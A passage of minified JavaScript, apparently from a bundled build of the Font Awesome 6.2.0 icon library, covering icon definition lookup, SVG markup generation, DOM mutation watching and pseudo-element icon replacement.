mbe={mixout:function(){return{dom:{css:vB,insertCss:W8}}},hooks:function(){return{beforeDOMElementCreation:function(){W8()},beforeI2svg:function(){W8()}}}},Yh=Mp||{};Yh[Xh]||(Yh[Xh]={}),Yh[Xh].styles||(Yh[Xh].styles={}),Yh[Xh].hooks||(Yh[Xh].hooks={}),Yh[Xh].shims||(Yh[Xh].shims=[]);var Im=Yh[Xh],TB=[],AA=!1;function hbe(t){!Kh||(AA?setTimeout(t,0):TB.push(t))}function Ab(t){var a=t.tag,e=t.attributes,i=void 0===e?{}:e,n=t.children,r=void 0===n?[]:n;return"string"==typeof t?MB(t):"<".concat(a," ").concat(function sbe(t){return Object.keys(t||{}).reduce(function(a,e){return a+"".concat(e,'="').concat(MB(t[e]),'" ')},"").trim()}(i),">").concat(r.map(Ab).join(""),"</").concat(a,">")}function EB(t,a,e){if(t&&t[a]&&t[a][e])return{prefix:a,iconName:e,icon:t[a][e]}}Kh&&((AA=(Mr.documentElement.doScroll?/^loaded|^c/:/^loaded|^i|^c/).test(Mr.readyState))||Mr.addEventListener("DOMContentLoaded",function t(){Mr.removeEventListener("DOMContentLoaded",t),AA=1,TB.map(function(a){return a()})}));var F8=function(a,e,i,n){var T,k,q,r=Object.keys(a),c=r.length,d=void 0!==n?function(a,e){return function(i,n,r,c){return a.call(e,i,n,r,c)}}(e,n):e;for(void 0===i?(T=1,q=a[r[0]]):(T=0,q=i);T<c;T++)q=d(q,a[k=r[T]],k,a);return q};function V8(t){var a=function pbe(t){for(var a=[],e=0,i=t.length;e<i;){var n=t.charCodeAt(e++);if(n>=55296&&n<=56319&&e<i){var r=t.charCodeAt(e++);56320==(64512&r)?a.push(((1023&n)<<10)+(1023&r)+65536):(a.push(n),e--)}else a.push(n)}return a}(t);return 1===a.length?a[0].toString(16):null}function DB(t){return Object.keys(t).reduce(function(a,e){var i=t[e];return i.icon?a[i.iconName]=i.icon:a[e]=i,a},{})}function B8(t,a){var e=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},i=e.skipHooks,n=void 0!==i&&i,r=DB(a);"function"!=typeof Im.hooks.addPack||n?Im.styles[t]=ia(ia({},Im.styles[t]||{}),r):Im.hooks.addPack(t,DB(a)),"fas"===t&&B8("fa",a)}var TA,EA,DA,Q1=Im.styles,gbe=Im.shims,Cbe=(Ws(TA={},vr,Object.values(Cb[vr])),Ws(TA,Qr,Object.values(Cb[Qr])),TA),H8=null,xB={},wB={},IB={},RB={},SB={},ybe=(Ws(EA={},vr,Object.keys(_b[vr])),Ws(EA,Qr,Object.keys(_b[Qr])),EA);function Mbe(t,a){var e=a.split("-"),i=e[0],n=e.slice(1).join("-");return i!==t||""===n||function bbe(t){return~ebe.indexOf(t)}(n)?null:n}var kB=function(){var a=function(r){return F8(Q1,function(c,d,T){return c[T]=F8(d,r,{}),c},{})};xB=a(function(n,r,c){return r[3]&&(n[r[3]]=c),r[2]&&r[2].filter(function(T){return"number"==typeof T}).forEach(function(T){n[T.toString(16)]=c}),n}),wB=a(function(n,r,c){return n[c]=c,r[2]&&r[2].filter(function(T){return"string"==typeof T}).forEach(function(T){n[T]=c}),n}),SB=a(function(n,r,c){var d=r[2];return n[c]=c,d.forEach(function(T){n[T]=c}),n});var e="far"in Q1||Ca.autoFetchSvg,i=F8(gbe,function(n,r){var c=r[0],d=r[1],T=r[2];return"far"===d&&!e&&(d="fas"),"string"==typeof c&&(n.names[c]={prefix:d,iconName:T}),"number"==typeof c&&(n.unicodes[c.toString(16)]={prefix:d,iconName:T}),n},{names:{},unicodes:{}});IB=i.names,RB=i.unicodes,H8=xA(Ca.styleDefault,{family:Ca.familyDefault})};function U8(t,a){return(xB[t]||{})[a]}function Tg(t,a){return(SB[t]||{})[a]}function PB(t){return IB[t]||{prefix:null,iconName:null}}function Ap(){return H8}function xA(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.family,i=void 0===e?vr:e,n=_b[i][t],r=gb[i][t]||gb[i][n],c=t in Im.styles?t:null;return r||c||null}(function nbe(t){Mb.push(t)})(function(t){H8=xA(t.styleDefault,{family:Ca.familyDefault})}),kB();var OB=(Ws(DA={},vr,Object.keys(Cb[vr])),Ws(DA,Qr,Object.keys(Cb[Qr])),DA);function wA(t){var a,e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.skipLookups,n=void 0!==i&&i,r=(Ws(a={},vr,"".concat(Ca.cssPrefix,"-").concat(vr)),Ws(a,Qr,"".concat(Ca.cssPrefix,"-").concat(Qr)),a),c=null,d=vr;(t.includes(r[vr])||t.some(function(k){return OB[vr].includes(k)}))&&(d=vr),(t.includes(r[Qr])||t.some(function(k){return OB[Qr].includes(k)}))&&(d=Qr);var T=t.reduce(function(k,q){var Y=Mbe(Ca.cssPrefix,q);if(Q1[q]?(q=Cbe[d].includes(q)?$ye[d][q]:q,c=q,k.prefix=q):ybe[d].indexOf(q)>-1?(c=q,k.prefix=xA(q,{family:d})):Y?k.iconName=Y:q!==Ca.replacementClass&&q!==r[vr]&&q!==r[Qr]&&k.rest.push(q),!n&&k.prefix&&k.iconName){var te="fa"===c?PB(k.iconName):{},pe=Tg(k.prefix,k.iconName);te.prefix&&(c=null),k.iconName=te.iconName||pe||k.iconName,k.prefix=te.prefix||k.prefix,"far"===k.prefix&&!Q1.far&&Q1.fas&&!Ca.autoFetchSvg&&(k.prefix="fas")}return k},{prefix:null,iconName:null,rest:[]});return(t.includes("fa-brands")||t.includes("fab"))&&(T.prefix="fab"),(t.includes("fa-duotone")||t.includes("fad"))&&(T.prefix="fad"),!T.prefix&&d===Qr&&(Q1.fass||Ca.autoFetchSvg)&&(T.prefix="fass",T.iconName=Tg(T.prefix,T.iconName)||T.iconName),("fa"===T.prefix||"fa"===c)&&(T.prefix=Ap()||"fas"),T}var Tbe=function(){function t(){(function Nye(t,a){if(!(t instanceof a))throw new TypeError("Cannot call a class as a function")})(this,t),this.definitions={}}return function Lye(t,a,e){a&&nB(t.prototype,a),e&&nB(t,e),Object.defineProperty(t,"prototype",{writable:!1})}(t,[{key:"add",value:function(){for(var e=this,i=arguments.length,n=new Array(i),r=0;r<i;r++)n[r]=arguments[r];var c=n.reduce(this._pullDefinitions,{});Object.keys(c).forEach(function(d){e.definitions[d]=ia(ia({},e.definitions[d]||{}),c[d]),B8(d,c[d]);var T=Cb[vr][d];T&&B8(T,c[d]),kB()})}},{key:"reset",value:function(){this.definitions={}}},{key:"_pullDefinitions",value:function(e,i){var n=i.prefix&&i.iconName&&i.icon?{0:i}:i;return Object.keys(n).map(function(r){var c=n[r],d=c.prefix,T=c.iconName,k=c.icon,q=k[2];e[d]||(e[d]={}),q.length>0&&q.forEach(function(Y){"string"==typeof Y&&(e[d][Y]=k)}),e[d][T]=k}),e}}]),t}(),NB=[],$1={},K1={},Ebe=Object.keys(K1);function G8(t,a){for(var e=arguments.length,i=new Array(e>2?e-2:0),n=2;n<e;n++)i[n-2]=arguments[n];var r=$1[t]||[];return r.forEach(function(c){a=c.apply(null,[a].concat(i))}),a}function Eg(t){for(var a=arguments.length,e=new Array(a>1?a-1:0),i=1;i<a;i++)e[i-1]=arguments[i];var n=$1[t]||[];n.forEach(function(r){r.apply(null,e)})}function Jh(){var t=arguments[0],a=Array.prototype.slice.call(arguments,1);return K1[t]?K1[t].apply(null,a):void 0}function j8(t){"fa"===t.prefix&&(t.prefix="fas");var a=t.iconName,e=t.prefix||Ap();if(a)return a=Tg(e,a)||a,EB(LB.definitions,e,a)||EB(Im.styles,e,a)}var LB=new Tbe,wbe={i2svg:function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};return Kh?(Eg("beforeI2svg",a),Jh("pseudoElements2svg",a),Jh("i2svg",a)):Promise.reject("Operation requires a DOM of some kind.")},watch:function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot;!1===Ca.autoReplaceSvg&&(Ca.autoReplaceSvg=!0),Ca.observeMutations=!0,hbe(function(){Rbe({autoReplaceSvgRoot:e}),Eg("watch",a)})}},Ql={noAuto:function(){Ca.autoReplaceSvg=!1,Ca.observeMutations=!1,Eg("noAuto")},config:Ca,dom:wbe,parse:{icon:function(a){if(null===a)return null;if("object"===fA(a)&&a.prefix&&a.iconName)return{prefix:a.prefix,iconName:Tg(a.prefix,a.iconName)||a.iconName};if(Array.isArray(a)&&2===a.length){var e=0===a[1].indexOf("fa-")?a[1].slice(3):a[1],i=xA(a[0]);return{prefix:i,iconName:Tg(i,e)||e}}if("string"==typeof a&&(a.indexOf("".concat(Ca.cssPrefix,"-"))>-1||a.match(Kye))){var n=wA(a.split(" "),{skipLookups:!0});return{prefix:n.prefix||Ap(),iconName:Tg(n.prefix,n.iconName)||n.iconName}}if("string"==typeof a){var r=Ap();return{prefix:r,iconName:Tg(r,a)||a}}}},library:LB,findIconDefinition:j8,toHtml:Ab},Rbe=function(){var a=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=a.autoReplaceSvgRoot,i=void 0===e?Mr:e;(Object.keys(Im.styles).length>0||Ca.autoFetchSvg)&&Kh&&Ca.autoReplaceSvg&&Ql.dom.i2svg({node:i})};function IA(t,a){return Object.defineProperty(t,"abstract",{get:a}),Object.defineProperty(t,"html",{get:function(){return t.abstract.map(function(i){return Ab(i)})}}),Object.defineProperty(t,"node",{get:function(){if(Kh){var i=Mr.createElement("div");return i.innerHTML=t.html,i.children}}}),t}function Q8(t){var a=t.icons,e=a.main,i=a.mask,n=t.prefix,r=t.iconName,c=t.transform,d=t.symbol,T=t.title,k=t.maskId,q=t.titleId,Y=t.extra,te=t.watchable,pe=void 0!==te&&te,Re=i.found?i:e,Fe=Re.width,Ne=Re.height,et="fak"===n,ut=[Ca.replacementClass,r?"".concat(Ca.cssPrefix,"-").concat(r):""].filter(function(Ai){return-1===Y.classes.indexOf(Ai)}).filter(function(Ai){return""!==Ai||!!Ai}).concat(Y.classes).join(" "),Ze={children:[],attributes:ia(ia({},Y.attributes),{},{"data-prefix":n,"data-icon":r,class:ut,role:Y.attributes.role||"img",xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 ".concat(Fe," ").concat(Ne)})},yt=et&&!~Y.classes.indexOf("fa-fw")?{width:"".concat(Fe/Ne*16*.0625,"em")}:{};pe&&(Ze.attributes[vg]=""),T&&(Ze.children.push({tag:"title",attributes:{id:Ze.attributes["aria-labelledby"]||"title-".concat(q||vb())},children:[T]}),delete Ze.attributes.title);var It=ia(ia({},Ze),{},{prefix:n,iconName:r,main:e,mask:i,maskId:k,transform:c,symbol:d,styles:ia(ia({},yt),Y.styles)}),St=i.found&&e.found?Jh("generateAbstractMask",It)||{children:[],attributes:{}}:Jh("generateAbstractIcon",It)||{children:[],attributes:{}},oi=St.attributes;return It.children=St.children,It.attributes=oi,d?function kbe(t){var e=t.iconName,i=t.children,n=t.attributes,r=t.symbol,c=!0===r?"".concat(t.prefix,"-").concat(Ca.cssPrefix,"-").concat(e):r;return[{tag:"svg",attributes:{style:"display: none;"},children:[{tag:"symbol",attributes:ia(ia({},n),{},{id:c}),children:i}]}]}(It):function Sbe(t){var a=t.children,e=t.main,i=t.mask,n=t.attributes,r=t.styles,c=t.transform;if(z8(c)&&e.found&&!i.found){var k={x:e.width/e.height/2,y:.5};n.style=vA(ia(ia({},r),{},{"transform-origin":"".concat(k.x+c.x/16,"em ").concat(k.y+c.y/16,"em")}))}return[{tag:"svg",attributes:n,children:a}]}(It)}function zB(t){var a=t.content,e=t.width,i=t.height,n=t.transform,r=t.title,c=t.extra,d=t.watchable,T=void 0!==d&&d,k=ia(ia(ia({},c.attributes),r?{title:r}:{}),{},{class:c.classes.join(" ")});T&&(k[vg]="");var q=ia({},c.styles);z8(n)&&(q.transform=function lbe(t){var a=t.transform,e=t.width,n=t.height,r=void 0===n?16:n,c=t.startCentered,d=void 0!==c&&c,T="";return T+=d&&hB?"translate(".concat(a.x/16-(void 0===e?16:e)/2,"em, ").concat(a.y/16-r/2,"em) "):d?"translate(calc(-50% + ".concat(a.x/16,"em), calc(-50% + ").concat(a.y/16,"em)) "):"translate(".concat(a.x/16,"em, ").concat(a.y/16,"em) "),(T+="scale(".concat(a.size/16*(a.flipX?-1:1),", ").concat(a.size/16*(a.flipY?-1:1),") "))+"rotate(".concat(a.rotate,"deg) ")}({transform:n,startCentered:!0,width:e,height:i}),q["-webkit-transform"]=q.transform);var Y=vA(q);Y.length>0&&(k.style=Y);var te=[];return te.push({tag:"span",attributes:k,children:[a]}),r&&te.push({tag:"span",attributes:{class:"sr-only"},children:[r]}),te}function Pbe(t){var a=t.content,e=t.title,i=t.extra,n=ia(ia(ia({},i.attributes),e?{title:e}:{}),{},{class:i.classes.join(" ")}),r=vA(i.styles);r.length>0&&(n.style=r);var c=[];return c.push({tag:"span",attributes:n,children:[a]}),e&&c.push({tag:"span",attributes:{class:"sr-only"},children:[e]}),c}var $8=Im.styles;function K8(t){var a=t[0],e=t[1],r=w8(t.slice(4),1)[0];return{found:!0,width:a,height:e,icon:Array.isArray(r)?{tag:"g",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("duotone-group")},children:[{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("secondary"),fill:"currentColor",d:r[0]}},{tag:"path",attributes:{class:"".concat(Ca.cssPrefix,"-").concat("primary"),fill:"currentColor",d:r[1]}}]}:{tag:"path",attributes:{fill:"currentColor",d:r}}}}var Obe={found:!1,width:512,height:512};function X8(t,a){var e=a;return"fa"===a&&null!==Ca.styleDefault&&(a=Ap()),new Promise(function(i,n){if(Jh("missingIconAbstract"),"fa"===e){var c=PB(t)||{};t=c.iconName||t,a=c.prefix||a}if(t&&a&&$8[a]&&$8[a][t])return i(K8($8[a][t]));(function Nbe(t,a){!gB&&!Ca.showMissingIcons&&t&&console.error('Icon with name "'.concat(t,'" and prefix "').concat(a,'" is missing.'))})(t,a),i(ia(ia({},Obe),{},{icon:Ca.showMissingIcons&&t&&Jh("missingIconAbstract")||{}}))})}var WB=function(){},Y8=Ca.measurePerformance&&_A&&_A.mark&&_A.measure?_A:{mark:WB,measure:WB},Tb='FA "6.2.0"',J8_begin=function(a){return Y8.mark("".concat(Tb," ").concat(a," begins")),function(){return function(a){Y8.mark("".concat(Tb," ").concat(a," ends")),Y8.measure("".concat(Tb," ").concat(a),"".concat(Tb," ").concat(a," begins"),"".concat(Tb," ").concat(a," ends"))}(a)}},RA=function(){};function VB(t){return"string"==typeof(t.getAttribute?t.getAttribute(vg):null)}function Vbe(t){return Mr.createElementNS("http://www.w3.org/2000/svg",t)}function Bbe(t){return Mr.createElement(t)}function BB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.ceFn,i=void 0===e?"svg"===t.tag?Vbe:Bbe:e;if("string"==typeof t)return Mr.createTextNode(t);var n=i(t.tag);Object.keys(t.attributes||[]).forEach(function(c){n.setAttribute(c,t.attributes[c])});var r=t.children||[];return r.forEach(function(c){n.appendChild(BB(c,{ceFn:i}))}),n}var SA={replace:function(a){var e=a[0];if(e.parentNode)if(a[1].forEach(function(n){e.parentNode.insertBefore(BB(n),e)}),null===e.getAttribute(vg)&&Ca.keepOriginalSource){var i=Mr.createComment(function Hbe(t){var a=" ".concat(t.outerHTML," ");return"".concat(a,"Font Awesome fontawesome.com ")}(e));e.parentNode.replaceChild(i,e)}else e.remove()},nest:function(a){var e=a[0],i=a[1];if(~L8(e).indexOf(Ca.replacementClass))return SA.replace(a);var n=new RegExp("".concat(Ca.cssPrefix,"-.*"));if(delete i[0].attributes.id,i[0].attributes.class){var r=i[0].attributes.class.split(" ").reduce(function(d,T){return T===Ca.replacementClass||T.match(n)?d.toSvg.push(T):d.toNode.push(T),d},{toNode:[],toSvg:[]});i[0].attributes.class=r.toSvg.join(" "),0===r.toNode.length?e.removeAttribute("class"):e.setAttribute("class",r.toNode.join(" "))}var c=i.map(function(d){return Ab(d)}).join("\n");e.setAttribute(vg,""),e.innerHTML=c}};function HB(t){t()}function UB(t,a){var e="function"==typeof a?a:RA;if(0===t.length)e();else{var i=HB;"async"===Ca.mutateApproach&&(i=Mp.requestAnimationFrame||HB),i(function(){var n=function Fbe(){return!0===Ca.autoReplaceSvg?SA.replace:SA[Ca.autoReplaceSvg]||SA.replace}(),r=J8_begin("mutate");t.map(n),r(),e()})}}var Z8=!1;function qB(){Z8=!0}function eI(){Z8=!1}var kA=null;function GB(t){if(uB&&Ca.observeMutations){var a=t.treeCallback,e=void 0===a?RA:a,i=t.nodeCallback,n=void 0===i?RA:i,r=t.pseudoElementsCallback,c=void 0===r?RA:r,d=t.observeMutationsRoot,T=void 0===d?Mr:d;kA=new uB(function(k){if(!Z8){var q=Ap();j1(k).forEach(function(Y){if("childList"===Y.type&&Y.addedNodes.length>0&&!VB(Y.addedNodes[0])&&(Ca.searchPseudoElements&&c(Y.target),e(Y.target)),"attributes"===Y.type&&Y.target.parentNode&&Ca.searchPseudoElements&&c(Y.target.parentNode),"attributes"===Y.type&&VB(Y.target)&&~Zye.indexOf(Y.attributeName))if("class"===Y.attributeName&&function zbe(t){var a=t.getAttribute?t.getAttribute(P8):null,e=t.getAttribute?t.getAttribute(O8):null;return a&&e}(Y.target)){var te=wA(L8(Y.target)),Re=te.iconName;Y.target.setAttribute(P8,te.prefix||q),Re&&Y.target.setAttribute(O8,Re)}else(function Wbe(t){return t&&t.classList&&t.classList.contains&&t.classList.contains(Ca.replacementClass)})(Y.target)&&n(Y.target)})}}),Kh&&kA.observe(T,{childList:!0,attributes:!0,characterData:!0,subtree:!0})}}function qbe(t){var a=t.getAttribute("style"),e=[];return a&&(e=a.split(";").reduce(function(i,n){var r=n.split(":"),c=r[0],d=r.slice(1);return c&&d.length>0&&(i[c]=d.join(":").trim()),i},{})),e}function Gbe(t){var a=t.getAttribute("data-prefix"),e=t.getAttribute("data-icon"),i=void 0!==t.innerText?t.innerText.trim():"",n=wA(L8(t));return n.prefix||(n.prefix=Ap()),a&&e&&(n.prefix=a,n.iconName=e),n.iconName&&n.prefix||(n.prefix&&i.length>0&&(n.iconName=function vbe(t,a){return(wB[t]||{})[a]}(n.prefix,t.innerText)||U8(n.prefix,V8(t.innerText))),!n.iconName&&Ca.autoFetchSvg&&t.firstChild&&t.firstChild.nodeType===Node.TEXT_NODE&&(n.iconName=t.firstChild.data)),n}function jbe(t){var a=j1(t.attributes).reduce(function(n,r){return"class"!==n.name&&"style"!==n.name&&(n[r.name]=r.value),n},{}),e=t.getAttribute("title"),i=t.getAttribute("data-fa-title-id");return Ca.autoA11y&&(e?a["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(i||vb()):(a["aria-hidden"]="true",a.focusable="false")),a}function jB(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{styleParser:!0},e=Gbe(t),i=e.iconName,n=e.prefix,r=e.rest,c=jbe(t),d=G8("parseNodeAttributes",{},t),T=a.styleParser?qbe(t):[];return ia({iconName:i,title:t.getAttribute("title"),titleId:t.getAttribute("data-fa-title-id"),prefix:n,transform:xu,mask:{iconName:null,prefix:null,rest:[]},maskId:null,symbol:!1,extra:{classes:r,styles:T,attributes:c}},d)}var $be=Im.styles;function QB(t){var a="nest"===Ca.autoReplaceSvg?jB(t,{styleParser:!1}):jB(t);return~a.extra.classes.indexOf(CB)?Jh("generateLayersText",t,a):Jh("generateSvgReplacementMutation",t,a)}var Tp=new Set;function $B(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(!Kh)return Promise.resolve();var e=Mr.documentElement.classList,i=function(Y){return e.add("".concat(_B,"-").concat(Y))},n=function(Y){return e.remove("".concat(_B,"-").concat(Y))},r=Ca.autoFetchSvg?Tp:N8.map(function(q){return"fa-".concat(q)}).concat(Object.keys($be));r.includes("fa")||r.push("fa");var c=[".".concat(CB,":not([").concat(vg,"])")].concat(r.map(function(q){return".".concat(q,":not([").concat(vg,"])")})).join(", ");if(0===c.length)return Promise.resolve();var d=[];try{d=j1(t.querySelectorAll(c))}catch(q){}if(!(d.length>0))return Promise.resolve();i("pending"),n("complete");var T=J8_begin("onTree"),k=d.reduce(function(q,Y){try{var te=QB(Y);te&&q.push(te)}catch(pe){gB||"MissingIcon"===pe.name&&console.error(pe)}return q},[]);return new Promise(function(q,Y){Promise.all(k).then(function(te){UB(te,function(){i("active"),i("complete"),n("pending"),"function"==typeof a&&a(),T(),q()})}).catch(function(te){T(),Y(te)})})}function Kbe(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;QB(t).then(function(e){e&&UB([e],a)})}N8.map(function(t){Tp.add("fa-".concat(t))}),Object.keys(_b[vr]).map(Tp.add.bind(Tp)),Object.keys(_b[Qr]).map(Tp.add.bind(Tp)),Tp=fb(Tp);var Ybe=function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=e.transform,n=void 0===i?xu:i,r=e.symbol,c=void 0!==r&&r,d=e.mask,T=void 0===d?null:d,k=e.maskId,q=void 0===k?null:k,Y=e.title,te=void 0===Y?null:Y,pe=e.titleId,Re=void 0===pe?null:pe,Fe=e.classes,Ne=void 0===Fe?[]:Fe,et=e.attributes,ut=void 0===et?{}:et,Ze=e.styles,yt=void 0===Ze?{}:Ze;if(a){var It=a.prefix,St=a.iconName,Nt=a.icon;return IA(ia({type:"icon"},a),function(){return Eg("beforeDOMElementCreation",{iconDefinition:a,params:e}),Ca.autoA11y&&(te?ut["aria-labelledby"]="".concat(Ca.replacementClass,"-title-").concat(Re||vb()):(ut["aria-hidden"]="true",ut.focusable="false")),Q8({icons:{main:K8(Nt),mask:T?K8(T.icon):{found:!1,width:null,height:null,icon:{}}},prefix:It,iconName:St,transform:ia(ia({},xu),n),symbol:c,title:te,maskId:q,titleId:Re,extra:{attributes:ut,styles:yt,classes:Ne}})})}},Jbe={mixout:function(){return{icon:(t=Ybe,function(a){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=(a||{}).icon?a:j8(a||{}),n=e.mask;return n&&(n=(n||{}).icon?n:j8(n||{})),t(i,ia(ia({},e),{},{mask:n}))})};var t},hooks:function(){return{mutationObserverCallbacks:function(e){return e.treeCallback=$B,e.nodeCallback=Kbe,e}}},provides:function(a){a.i2svg=function(e){var i=e.node,r=e.callback;return $B(void 0===i?Mr:i,void 0===r?function(){}:r)},a.generateSvgReplacementMutation=function(e,i){var n=i.iconName,r=i.title,c=i.titleId,d=i.prefix,T=i.transform,k=i.symbol,q=i.mask,Y=i.maskId,te=i.extra;return new Promise(function(pe,Re){Promise.all([X8(n,d),q.iconName?X8(q.iconName,q.prefix):Promise.resolve({found:!1,width:512,height:512,icon:{}})]).then(function(Fe){var Ne=w8(Fe,2);pe([e,Q8({icons:{main:Ne[0],mask:Ne[1]},prefix:d,iconName:n,transform:T,symbol:k,maskId:Y,title:r,titleId:c,extra:te,watchable:!0})])}).catch(Re)})},a.generateAbstractIcon=function(e){var k,i=e.children,n=e.attributes,r=e.main,c=e.transform,T=vA(e.styles);return T.length>0&&(n.style=T),z8(c)&&(k=Jh("generateAbstractTransformGrouping",{main:r,transform:c,containerWidth:r.width,iconWidth:r.width})),i.push(k||r.icon),{children:i,attributes:n}}}},Zbe={mixout:function(){return{layer:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.classes,r=void 0===n?[]:n;return IA({type:"layer"},function(){Eg("beforeDOMElementCreation",{assembler:e,params:i});var c=[];return e(function(d){Array.isArray(d)?d.map(function(T){c=c.concat(T.abstract)}):c=c.concat(d.abstract)}),[{tag:"span",attributes:{class:["".concat(Ca.cssPrefix,"-layers")].concat(fb(r)).join(" ")},children:c}]})}}}},eMe={mixout:function(){return{counter:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.title,r=void 0===n?null:n,c=i.classes,d=void 0===c?[]:c,T=i.attributes,k=void 0===T?{}:T,q=i.styles,Y=void 0===q?{}:q;return IA({type:"counter",content:e},function(){return Eg("beforeDOMElementCreation",{content:e,params:i}),Pbe({content:e.toString(),title:r,extra:{attributes:k,styles:Y,classes:["".concat(Ca.cssPrefix,"-layers-counter")].concat(fb(d))}})})}}}},tMe={mixout:function(){return{text:function(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=i.transform,r=void 0===n?xu:n,c=i.title,d=void 0===c?null:c,T=i.classes,k=void 0===T?[]:T,q=i.attributes,Y=void 0===q?{}:q,te=i.styles,pe=void 0===te?{}:te;return IA({type:"text",content:e},function(){return Eg("beforeDOMElementCreation",{content:e,params:i}),zB({content:e,transform:ia(ia({},xu),r),title:d,extra:{attributes:Y,styles:pe,classes:["".concat(Ca.cssPrefix,"-layers-text")].concat(fb(k))}})})}}},provides:function(a){a.generateLayersText=function(e,i){var n=i.title,r=i.transform,c=i.extra,d=null,T=null;if(hB){var k=parseInt(getComputedStyle(e).fontSize,10),q=e.getBoundingClientRect();d=q.width/k,T=q.height/k}return Ca.autoA11y&&!n&&(c.attributes["aria-hidden"]="true"),Promise.resolve([e,zB({content:e.innerHTML,width:d,height:T,transform:r,title:n,extra:c,watchable:!0})])}}},iMe=new RegExp('"',"ug"),KB=[1105920,1112319];function XB(t,a){var e="".concat("data-fa-pseudo-element-pending").concat(a.replace(":","-"));return new Promise(function(i,n){if(null!==t.getAttribute(e))return i();var c=j1(t.children).filter(function(Nt){return Nt.getAttribute(k8)===a})[0],d=Mp.getComputedStyle(t,a),T=d.getPropertyValue("font-family").match(Xye),k=d.getPropertyValue("font-weight"),q=d.getPropertyValue("content");if(c&&!T)return t.removeChild(c),i();if(T&&"none"!==q&&""!==q){var Y=d.getPropertyValue("content"),te=~["Sharp"].indexOf(T[2])?Qr:vr,pe=~["Solid","Regular","Light","Thin","Duotone","Brands","Kit"].indexOf(T[2])?gb[te][T[2].toLowerCase()]:Yye[te][k],Re=function aMe(t){var a=t.replace(iMe,""),e=function _be(t,a){var n,e=t.length,i=t.charCodeAt(a);return i>=55296&&i<=56319&&e>a+1&&(n=t.charCodeAt(a+1))>=56320&&n<=57343?1024*(i-55296)+n-56320+65536:i}(a,0),i=e>=KB[0]&&e<=KB[1],n=2===a.length&&a[0]===a[1];return{value:V8(n?a[0]:a),isSecondary:i||n}}(Y),Fe=Re.value,Ne=Re.isSecondary,et=T[0].startsWith("FontAwesome"),ut=U8(pe,Fe),Ze=ut;if(et){var yt=function Abe(t){var a=RB[t],e=U8("fas",t);return a||(e?{prefix:"fas",iconName:e}:null)||{prefix:null,iconName:null}}(Fe);yt.iconName&&yt.prefix&&(ut=yt.iconName,pe=yt.prefix)}if(!ut||Ne||c&&c.getAttribute(P8)===pe&&c.getAttribute(O8)===Ze)i();else{t.setAttribute(e,Ze),c&&t.removeChild(c);var It=function Qbe(){return{iconName:null,title:null,titleId:null,prefix:null,transform:xu,symbol:!1,mask:{iconName:null,prefix:null,rest:[]},maskId:null,extra:{classes:[],styles:{},attributes:{}}}}(),St=It.extra;St.attributes[k8]=a,X8(ut,pe).then(function(Nt){var oi=Q8(ia(ia({},It),{},{icons:{main:Nt,mask:{prefix:null,iconName:null,rest:[]}},prefix:pe,iconName:Ze,extra:St,watchable:!0})),Ai=Mr.createElement("svg");"::before"===a?t.insertBefore(Ai,t.firstChild):t.appendChild(Ai),Ai.outerHTML=oi.map(function(vi){return Ab(vi)}).join("\n"),t.removeAttribute(e),i()}).catch(n)}}else i()})}function nMe(t){return Promise.all([XB(t,"::before"),XB(t,"::after")])}function oMe(t){return!(t.parentNode===document.head||~Qye.indexOf(t.tagName.toUpperCase())||t.getAttribute(k8)||t.parentNode&&"svg"===t.parentNode.tagName)}function YB(t){if(Kh)return new Promise(function(a,e){var i=j1(t.querySelectorAll("*")).filter(oMe).map(nMe),n=J8_begin("searchPseudoElements");qB(),Promise.all(i).then(function(){n(),eI(),a()}).catch(function(){n(),eI(),e()})})}var JB=!1,ZB=function(a){return a.toLowerCase().split(" ").reduce(function(i,n){var r=n.toLowerCase().split("-"),c=r[0],d=r.slice(1).join("-");if(c&&"h"===d)return i.flipX=!0,i;if(c&&"v"===d)return i.flipY=!0,i;if(d=parseFloat(d),isNaN(d))return i;switch(c){case"grow":i.size=i.size+d;break;case"shrink":i.size=i.size-d;break;case"left":i.x=i.x-d;break;case"right":i.x=i.x+d;break;case"up":i.y=i.y-d;break;case"down":i.y=i.y+d;break;case"rotate":i.rotate=i.rotate+d}return i},{size:16,x:0,y:0,flipX:!1,flipY:!1,rotate:0})},tI={x:0,y:0,width:"100%",height:"100%"};function eH(t){var a=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];return t.attributes&&(t.attributes.fill||a)&&(t.attributes.fill="black"),t}!function Dbe(t,a){var e=a.mixoutsTo;NB=t,$1={},Object.keys(K1).forEach(function(i){-1===Ebe.indexOf(i)&&delete K1[i]}),NB.forEach(function(i){var n=i.mixout?i.mixout():{};if(Object.keys(n).forEach(function(c){"function"==typeof n[c]&&(e[c]=n[c]),"object"===fA(n[c])&&Object.keys(n[c]).forEach(function(d){e[c]||(e[c]={}),e[c][d]=n[c][d]})}),i.hooks){var r=i.hooks();Object.keys(r).forEach(function(c){$1[c]||($1[c]=[]),$1[c].push(r[c])})}i.provides&&i.provides(K1)})}([mbe,Jbe,Zbe,eMe,tMe,{hooks:function(){return{mutationObserverCallbacks:function(e){return e.pseudoElementsCallback=YB,e}}},provides:function(a){a.pseudoElements2svg=function(e){var i=e.node;Ca.searchPseudoElements&&YB(void 0===i?Mr:i)}}},{mixout:function(){return{dom:{unwatch:function(){qB(),JB=!0}}}},hooks:function(){return{bootstrap:function(){GB(G8("mutationObserverCallbacks",{}))},noAuto:function(){!function 